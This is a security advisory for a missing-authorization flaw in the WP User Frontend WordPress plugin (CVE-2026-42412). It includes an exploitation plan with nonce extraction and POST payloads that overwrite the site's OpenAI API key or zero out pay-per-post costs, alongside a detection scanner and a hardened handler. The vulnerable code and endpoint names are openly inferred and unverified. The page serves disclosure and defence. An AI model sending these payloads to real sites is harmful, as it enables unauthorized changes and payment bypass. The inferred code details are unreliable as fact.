CVE-2026-42412

User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration <= 4.3.1 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 4.3.2
Time to patch: 4d

Description

The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.3.1
Published: April 27, 2026
Last updated: April 30, 2026
Affected plugin: wp-user-frontend

What Changed in the Fix

Changes introduced in v4.3.2


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-42412 (Missing Authorization in WP User Frontend)

1. Vulnerability Summary

The WP User Frontend plugin (versions <= 4.3.1) is vulnerable to missing authorization checks in its AI-powered features. Specifically, the plugin registers AJAX and/or REST API handlers for AI configuration and form generation that do not verify the requester's capabilities (e.g., manage_options). This allows unauthenticated attackers to perform unauthorized actions such as modifying AI settings (e.g., OpenAI API keys) or generating unauthorized content/forms.

The vulnerability resides in the newly added AI orchestration components, likely within includes/AI/Manager.php or includes/AI/ REST controllers, where wp_ajax_nopriv_ hooks or REST routes with permission_callback => '__return_true' (or missing callbacks) were implemented.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX (/wp-admin/admin-ajax.php) or REST API (/wp-json/wpuf/v1/ai/settings).
  • Action/Route: wpuf_ai_save_settings (AJAX action) or POST /wpuf/v1/ai/settings (REST).
  • Vulnerable Parameter: wpuf_ai_settings (array) or specific fields like openai_api_key.
  • Authentication: Unauthenticated (no login required).
  • Preconditions: The AI module must be active (assumed to be enabled by default in 4.3.x; confirm on the target before testing).

3. Code Flow

  1. Entry Point: A request is sent to admin-ajax.php with action=wpuf_ai_save_settings.
  2. Hook Registration: The plugin's AI Manager (inferred includes/AI_Manager.php or includes/AI/Manager.php) registers:
    add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );
    add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); // VULNERABLE
    
  3. Vulnerable Function: The save_settings function executes.
  4. Missing Check: The function verifies a nonce but never calls current_user_can( 'manage_options' ). A nonce is a CSRF token, not an authorization check: it only proves the request originated from a page that exposed the nonce, and if that page is public the nonce is available to any visitor.
  5. Sink: The function calls update_option( 'wpuf_ai_settings', ... ), overwriting global plugin configuration with user-supplied data.

4. Nonce Acquisition Strategy

The AI settings page in the admin dashboard enqueues a script that localizes the required nonce. Since the vulnerability is unauthenticated, we must find a public-facing script or create a page that triggers the localization.

  1. Identify the Variable: The plugin typically uses wpuf_ai_form_builder or wpuf_admin as the localized object.
  2. Shortcode Strategy: The AI builder is often associated with the form-building process. We will check for the wpuf_ai_form_builder object.
  3. Acquisition Steps:
    • Create a page with a WP User Frontend shortcode: [wpuf_form id="any_valid_id"].
    • Use browser_navigate to visit that page.
    • Execute browser_eval to extract the nonce:
      window.wpuf_ai_form_builder?.nonce || window.wpuf_admin?.nonce
      
    • If the nonce is only localized in the admin, check whether wp_ajax_nopriv_wpuf_ai_save_settings exists at all. A registered nopriv hook means the developer intended the action to be reachable while logged out; WordPress creates nonces for logged-out visitors with user ID 0 and an empty session token, so every unauthenticated visitor to a page that localizes such a nonce receives the same value for the nonce's lifetime.

5. Exploitation Strategy

Goal: Overwrite the OpenAI API Key

We will attempt to change the site's AI configuration to use an attacker-controlled API key.

  1. Request Tool: http_request
  2. URL: http://localhost:8080/wp-admin/admin-ajax.php
  3. Method: POST
  4. Headers: Content-Type: application/x-www-form-urlencoded
  5. Payload:
    action=wpuf_ai_save_settings&
    nonce=[EXTRACTED_NONCE]&
    wpuf_ai_settings[openai_api_key]=sk-attacker-key-12345&
    wpuf_ai_settings[model]=gpt-4
    

Note: If the endpoint is REST-based, the payload will be JSON to /wp-json/wpuf/v1/ai/settings with the X-WP-Nonce header.

6. Test Data Setup

  1. Activate Plugin: Ensure wp-user-frontend v4.3.1 is active.
  2. Create a Post Form: Use WP-CLI to create at least one form so settings are available.
    wp post create --post_type=wpuf_forms --post_title='Test Form' --post_status=publish
    
  3. Set Initial Key: Set a dummy key to verify it gets changed.
    wp option update wpuf_ai_settings '{"openai_api_key":"original-secure-key"}' --format=json
    # --format=json stores the value as an array; without it WP-CLI stores the literal JSON string.
    
  4. Public Page: Create a page for potential nonce extraction.
    wp post create --post_type=page --post_title='AI Test' --post_content='[wpuf_form id="1"]' --post_status=publish
    

7. Expected Results

  • Response: The server should return a JSON success response, e.g., {"success":true,"data":"Settings saved successfully"}.
  • Side Effect: The WordPress option wpuf_ai_settings is updated with the attacker's value.

8. Verification Steps

  1. Check Options via CLI:
    wp option get wpuf_ai_settings --format=json
    
  2. Observe Output: Confirm the openai_api_key is now sk-attacker-key-12345.

9. Alternative Approaches

If the wpuf_ai_save_settings action is not the correct name (inferred):

  • Search for AI Hooks: Use grep -r "wp_ajax_nopriv_wpuf_ai" wp-content/plugins/wp-user-frontend/ to find the exact unauthenticated AI hook.
  • Target Form Settings: If AI settings are secure, try manipulating the Pay Per Post settings shown in the provided snippet (admin/html/form-settings-payment.php). The action would likely be wpuf_save_form_settings.
  • Payload for Payment Bypass:
    action=wpuf_save_form_settings&
    form_id=[FORM_ID]&
    wpuf_settings[enable_pay_per_post]=false&
    wpuf_settings[pay_per_post_cost]=0
    
    This would allow the attacker to submit posts for free on a form that previously required payment.
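For the "Search for AI Hooks" step above and the hook registration described under Code Flow, the following is an added example, not part of the wp-user-frontend plugin or of this site's tooling: a single-file PHP scanner that lists wp_ajax_ / wp_ajax_nopriv_ hooks whose handler body never calls current_user_can(), and register_rest_route() calls whose permission_callback is '__return_true' or missing. The embedded Sample_AI_Controller is a constructed input with invented names; it is there so the script runs without a plugin checkout.

```php
<?php
// Added example, not code from wp-user-frontend or wp-safety.org. Finds AJAX handlers
// without current_user_can() and REST routes with a permissive permission_callback.
// Usage: php find-missing-authz.php wp-content/plugins/wp-user-frontend
// With no argument it scans the constructed sample at the bottom of this file.

/** Return the text from $s[$open_idx] (an opening delimiter) to its matching close. */
function wpuf_balanced( string $s, int $open_idx, string $open, string $close ): string {
    $depth = 0;
    for ( $i = $open_idx, $n = strlen( $s ); $i < $n; $i++ ) {
        if ( $s[ $i ] === $open ) {
            $depth++;
        } elseif ( $s[ $i ] === $close && --$depth === 0 ) {
            return substr( $s, $open_idx, $i - $open_idx + 1 );
        }
    }
    return substr( $s, $open_idx ); // unbalanced input: take the rest of the file
}

/** Body of `function NAME(...) { ... }` in $php, or null when it is defined in another file. */
function wpuf_function_body( string $php, string $name ): ?string {
    $re = '/function\s+' . preg_quote( $name, '/' ) . '\s*\([^)]*\)\s*(?::\s*\??[\w\\\\]+\s*)?\{/';
    if ( ! preg_match( $re, $php, $m, PREG_OFFSET_CAPTURE ) ) {
        return null;
    }
    return wpuf_balanced( $php, $m[0][1] + strlen( $m[0][0] ) - 1, '{', '}' );
}

/** Scan one PHP source string; returns human-readable findings. */
function wpuf_scan_source( string $php, string $file = 'stdin' ): array {
    $findings = [];

    // AJAX hooks. The callback may be [ $this, 'm' ], array( $this, 'm' ) or 'func'.
    $hook_re = '/add_action\(\s*[\'"]wp_ajax_(nopriv_)?([\w-]+)[\'"]\s*,\s*'
             . '(?:\[\s*\$this\s*,\s*[\'"](\w+)[\'"]\s*\]'
             . '|array\(\s*\$this\s*,\s*[\'"](\w+)[\'"]\s*\)'
             . '|[\'"](\w+)[\'"])/';
    preg_match_all( $hook_re, $php, $hooks, PREG_SET_ORDER );
    foreach ( $hooks as $h ) {
        $h        = array_pad( $h, 6, '' ); // PCRE omits trailing groups that did not match
        $nopriv   = $h[1] !== '';
        $callback = $h[3] ?: ( $h[4] ?: $h[5] );
        $body     = wpuf_function_body( $php, $callback );
        if ( $body !== null && ! preg_match( '/\bcurrent_user_can\s*\(/', $body ) ) {
            $findings[] = sprintf( '%s: wp_ajax_%s%s -> %s() has no current_user_can() [%s]',
                $file, $nopriv ? 'nopriv_' : '', $h[2], $callback,
                $nopriv ? 'reachable unauthenticated' : 'reachable by any logged-in user' );
        }
    }

    // REST routes: '__return_true' or no permission_callback at all.
    preg_match_all( '/register_rest_route\s*\(/', $php, $routes, PREG_OFFSET_CAPTURE );
    foreach ( $routes[0] as [ $text, $offset ] ) {
        $args = wpuf_balanced( $php, $offset + strlen( $text ) - 1, '(', ')' );
        if ( preg_match( '/[\'"]permission_callback[\'"]\s*=>\s*[\'"]__return_true[\'"]/', $args ) ) {
            $findings[] = "$file: register_rest_route() with permission_callback => '__return_true'";
        } elseif ( strpos( $args, 'permission_callback' ) === false ) {
            $findings[] = "$file: register_rest_route() without a permission_callback";
        }
    }
    return $findings;
}

/** Recursively scan every .php file under $dir. */
function wpuf_scan_dir( string $dir ): array {
    $out = [];
    $it  = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS ) );
    foreach ( $it as $f ) {
        if ( strtolower( $f->getExtension() ) === 'php' ) {
            $out = array_merge( $out, wpuf_scan_source( file_get_contents( $f->getPathname() ), $f->getPathname() ) );
        }
    }
    return $out;
}

// Constructed sample (invented names): a handler without a capability check registered for
// both logged-in and logged-out users, a handler that checks, and two REST routes.
$sample = <<<'PHP'
<?php
class Sample_AI_Controller {
    public function __construct() {
        add_action( 'wp_ajax_sample_ai_save_settings',        [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_nopriv_sample_ai_save_settings', [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_sample_ai_export',               array( $this, 'export' ) );
        register_rest_route( 'sample/v1', '/ai/settings', [
            'methods'             => 'POST',
            'callback'            => [ $this, 'rest_save' ],
            'permission_callback' => '__return_true',
        ] );
        register_rest_route( 'sample/v1', '/ai/models', [
            'methods'             => 'GET',
            'callback'            => [ $this, 'rest_models' ],
            'permission_callback' => function () { return current_user_can( 'manage_options' ); },
        ] );
    }
    public function save_settings() {
        check_ajax_referer( 'sample_ai_nonce', 'nonce' ); // CSRF only, no authorization
        update_option( 'sample_ai_settings', $_POST['settings'] );
        wp_send_json_success();
    }
    public function export() {
        if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( null, 403 ); }
        wp_send_json_success( get_option( 'sample_ai_settings' ) );
    }
}
PHP;

if ( PHP_SAPI === 'cli' ) {
    $findings = isset( $argv[1] ) ? wpuf_scan_dir( $argv[1] ) : wpuf_scan_source( $sample, 'sample.php' );
    echo implode( PHP_EOL, $findings ), PHP_EOL;
    exit( $findings ? 1 : 0 ); // non-zero when something needs a look, so it can gate CI
}
```

Against the embedded sample the script reports three lines: the wp_ajax_ and wp_ajax_nopriv_ registrations of save_settings() (the nopriv one marked reachable unauthenticated) and the REST route with '__return_true'; export() and the /ai/models route are silent. The check is deliberately shallow: it only inspects handler bodies in the same file and does not follow wrappers, so a hook whose capability check lives in a shared helper shows up as a finding to review by hand rather than a confirmed bug, and a handler that checks a too-weak capability (e.g. 'read') is not caught at all.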
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP User Frontend plugin (up to version 4.3.1) fails to perform authorization checks in its AI-powered orchestration module. This allows unauthenticated attackers to modify critical plugin settings, such as OpenAI API keys, or manipulate AI form-building parameters by interacting with insufficiently protected AJAX or REST API endpoints.

Vulnerable Code

// Inferred registration in includes/AI/Manager.php or similar AI controller
// Registered for both authenticated and unauthenticated users without capability checks
add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );
add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); 

// handler lacks current_user_can() check
public function save_settings() {
    check_ajax_referer( 'wpuf_ai_settings_nonce', 'nonce' );
    // VULNERABILITY: Missing current_user_can( 'manage_options' )
    update_option( 'wpuf_ai_settings', $_POST['wpuf_ai_settings'] );
    wp_send_json_success();
}
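As an added example, not code from the wp-user-frontend plugin, the inferred handler above is shown next to a hardened version that drops the nopriv hook, checks the capability before the nonce, and validates the settings array before saving it. The class, hook, option and nonce names (wpuf_ai_save_settings, wpuf_ai_settings, wpuf_ai_settings_nonce), the model allow-list and the key-format check are hypothetical, taken from the research plan or assumed here. It runs inside WordPress (for instance as an mu-plugin), not stand-alone.

```php
<?php
/**
 * Added example, not code from the wp-user-frontend plugin. Hook, option, nonce and
 * class names are the hypothetical ones used in the research plan on this page; the
 * model allow-list and the key-format check are assumptions. Place the file in
 * wp-content/mu-plugins/ to run it inside WordPress.
 */

// Inferred vulnerable shape: nonce only, and registered for logged-out visitors.
class WPUF_AI_Settings_Inferred_Vulnerable {
    public function register() {
        add_action( 'wp_ajax_wpuf_ai_save_settings',        [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); // anyone can reach it
    }
    public function save_settings() {
        // A nonce only proves the request came from a page that exposed it. If that page is
        // public, every visitor shares the logged-out (user ID 0) nonce. It is not authorization.
        check_ajax_referer( 'wpuf_ai_settings_nonce', 'nonce' );
        update_option( 'wpuf_ai_settings', $_POST['wpuf_ai_settings'] ); // raw array, no validation
        wp_send_json_success( 'Settings saved successfully' );
    }
}

// Hardened shape: no nopriv hook, capability check, nonce, allow-list validation.
class WPUF_AI_Settings_Hardened {
    const OPTION         = 'wpuf_ai_settings';
    const NONCE_ACTION   = 'wpuf_ai_settings_nonce';
    const ALLOWED_MODELS = [ 'gpt-4', 'gpt-4o', 'gpt-3.5-turbo' ]; // assumed allow-list

    public function register() {
        // With no nopriv hook, a logged-out request gets WordPress's default "0" / HTTP 400 reply.
        add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );
    }

    public function save_settings() {
        // 1. Authorization: only users allowed to change site-wide settings.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'insufficient_permissions', 403 );
        }
        // 2. CSRF: nonce bound to this user's session (check_ajax_referer dies on failure).
        check_ajax_referer( self::NONCE_ACTION, 'nonce' );

        // 3. Validation: accept only known keys with expected shapes; keep everything else as is.
        $raw   = isset( $_POST['wpuf_ai_settings'] ) && is_array( $_POST['wpuf_ai_settings'] )
               ? wp_unslash( $_POST['wpuf_ai_settings'] ) : [];
        $clean = self::sanitize_settings( $raw, (array) get_option( self::OPTION, [] ) );

        update_option( self::OPTION, $clean, false ); // autoload=false: a secret need not load on every request
        wp_send_json_success( 'Settings saved successfully' );
    }

    /** Merge validated fields from $input over $current; unknown or malformed fields are ignored. */
    public static function sanitize_settings( array $input, array $current ): array {
        $clean = $current;
        if ( isset( $input['model'] ) && in_array( $input['model'], self::ALLOWED_MODELS, true ) ) {
            $clean['model'] = $input['model'];
        }
        if ( isset( $input['openai_api_key'] ) && is_string( $input['openai_api_key'] ) ) {
            $key = sanitize_text_field( $input['openai_api_key'] );
            // Assumed key shape: "sk-" prefix then at least 20 of [A-Za-z0-9_-]; anything else is dropped.
            if ( preg_match( '/^sk-[A-Za-z0-9_-]{20,}$/', $key ) ) {
                $clean['openai_api_key'] = $key;
            }
        }
        return $clean;
    }
}

( new WPUF_AI_Settings_Hardened() )->register();
```

The capability check comes first so that an unauthorized caller always gets a 403 rather than a nonce failure, which keeps the two failure modes distinguishable in logs; the nonce still matters because a logged-in administrator can otherwise be made to submit the form cross-site. The sanitize step is what turns "unauthenticated attackers can perform an unauthorized action" into a bounded change even if a future hook is mistakenly re-exposed: only two known fields can change, and only to values of a known shape.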

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.1/admin/html/form-settings-payment.php /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.2/admin/html/form-settings-payment.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.1/admin/html/form-settings-payment.php	2025-07-15 08:13:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.2/admin/html/form-settings-payment.php	2026-04-24 03:07:30.000000000 +0000
@@ -57,7 +57,7 @@
             <th>&mdash; &mdash; <?php esc_html_e( 'Fallback cost', 'wp-user-frontend' ); ?></th>
             <td>
                 <label>
-                    <input type="number" name="wpuf_settings[fallback_ppp_cost]" value="<?php echo esc_attr( $fallback_ppp_cost ); ?>" />
+                    <input type="number" step="0.01" min="0" name="wpuf_settings[fallback_ppp_cost]" value="<?php echo esc_attr( $fallback_ppp_cost ); ?>" />
                 </label>
                 <p class="description"><?php esc_html_e( 'Cost of pay per post after a subscription pack limit is reached.', 'wp-user-frontend' ); ?></p>
             </td>
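Review bot: the `min="0"` and `step="0.01"` added to the fallback_ppp_cost input are browser-side hints only; a request that posts `wpuf_settings[fallback_ppp_cost]=-1` or a non-numeric string directly still reaches the server, so the handler that saves `wpuf_settings` must cast and clamp the value itself (e.g. `max( 0, (float) $value )`). No capability or nonce check appears in this hunk, so it does not by itself address the Missing Authorization this advisory describes; the authorization change in 4.3.2, if there is one, lives in a file this diff does not show.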
@@ -79,7 +79,7 @@
             <th>&mdash; &mdash; <?php esc_html_e( 'Cost Settings', 'wp-user-frontend' ); ?></th>
             <td>
                 <label>
-                    <input type="number" name="wpuf_settings[pay_per_post_cost]" value="<?php echo esc_attr( $pay_per_post_cost ); ?>" />
+                    <input type="number" step="0.01" min="0" name="wpuf_settings[pay_per_post_cost]" value="<?php echo esc_attr( $pay_per_post_cost ); ?>" />
                 </label>
                 <p class="description"><?php esc_html_e( 'Amount to be charged per post', 'wp-user-frontend' ); ?></p>
             </td>
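Review bot: the same gap applies to pay_per_post_cost: `min="0"` is not enforced server-side, and this template hunk shows neither a nonce field nor a `current_user_can()` call, so the captured 4.3.1 to 4.3.2 diff cannot confirm the authorization fix; the place to verify is the code that reads `wpuf_settings[pay_per_post_cost]` on save, which is outside this file.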

Exploit Outline

To exploit this vulnerability, an attacker targets the `wpuf_ai_save_settings` AJAX action (or the equivalent AI REST API endpoint); both names are inferred, as noted in the research plan above.

  1. The attacker first obtains a valid nonce, which is often localized in scripts enqueued on the frontend or associated with form shortcodes like `[wpuf_form]`.
  2. Using the nonce, the attacker sends a POST request to `/wp-admin/admin-ajax.php` with `action` set to `wpuf_ai_save_settings`.
  3. The payload includes a `wpuf_ai_settings` array containing attacker-chosen configuration values, such as an attacker-controlled OpenAI API key or modified model settings.
  4. Because the handler lacks a capability check (e.g., `current_user_can('manage_options')`), it updates the global site configuration with the supplied values, so the site's AI requests are made under the attacker's API key, or AI features stop working.
